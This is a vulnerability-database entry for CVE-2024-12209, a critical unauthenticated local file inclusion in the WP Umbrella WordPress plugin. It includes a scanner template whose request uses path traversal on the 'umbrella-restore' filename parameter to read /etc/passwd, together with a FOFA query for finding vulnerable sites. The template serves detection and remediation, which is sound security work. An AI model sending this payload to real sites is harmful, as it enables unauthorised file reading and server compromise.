WP Umbrella Update Backup Restore & Monitoring <= 2.17.0 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for CVE-2024-12209 | 9 Dec 202411:51 | – | githubexploit | |
| Vulnerability of the WP Umbrella plugin: Updates, backup restoration, and monitoring of the WordPress content management system, allowing attackers to gain unauthorized access to confidential information or execute arbitrary code. | 11 Dec 202400:00 | – | bdu_fstec | |
| CVE-2024-12209 | 8 Dec 202405:33 | – | circl | |
| WordPress plugin WP Umbrella: Update Backup Restore & Monitoring 安全漏洞 | 8 Dec 202400:00 | – | cnnvd | |
| WordPress Plugin WP Umbrella: Update Backup Restore & Monitoring Local File Containment Vulnerability | 11 Dec 202400:00 | – | cnvd | |
| CVE-2024-12209 | 8 Dec 202405:25 | – | cve | |
| CVE-2024-12209 WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion | 8 Dec 202405:25 | – | cvelist | |
| CVE-2024-12209 | 9 Sep 202611:41 | – | kitploit | |
| CVE-2024-12209 | 6 Sep 202614:26 | – | kitploit | |
| CVE-2024-12209 | 8 Dec 202406:15 | – | nvd |
10
id: CVE-2024-12209
info:
name: WP Umbrella Update Backup Restore & Monitoring <= 2.17.0 - Local File Inclusion
author: s4e-io
severity: critical
description: |
The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
impact: |
Unauthenticated attackers can exploit local file inclusion through the filename parameter in the umbrella-restore action to read arbitrary server files including /etc/passwd, execute PHP code, and gain complete server compromise.
remediation: |
Validate and sanitize user inputs to prevent directory traversal. Use a whitelist approach for file paths and restrict file access to intended directories only.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-12209
- https://plugins.trac.wordpress.org/browser/wp-health/tags/v2.16.4/src/Actions/RestoreRouter.php#L45
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3202883%40wp-health&new=3202883%40wp-health&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-12209
cwe-id: CWE-98
epss-score: 0.23364
epss-percentile: 0.97641
metadata:
verified: true
max-request: 1
vendor: wp-umbrella
product: wp-umbrella
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-health"
tags: cve,cve2024,wp,wordpress,wp-plugin,wp-health,lfi,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '/wp-content/plugins/wp-health'
internal: true
- raw:
- |
GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- "contains(content_type, 'text/html')"
- "status_code == 200"
condition: and
# digest: 490a0046304402205cc64b4f1941811eae38829b43a8346e21b94e622a180e47ed1e7e679f834b3a02207b9ba6397f8022e9598efc3cb33d95dc898c816c72c204ebed1e69a6e3d0f548:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.6High risk
Vulners AI Score8.6
CVSS 3.19.8
EPSS0.23364
SSVC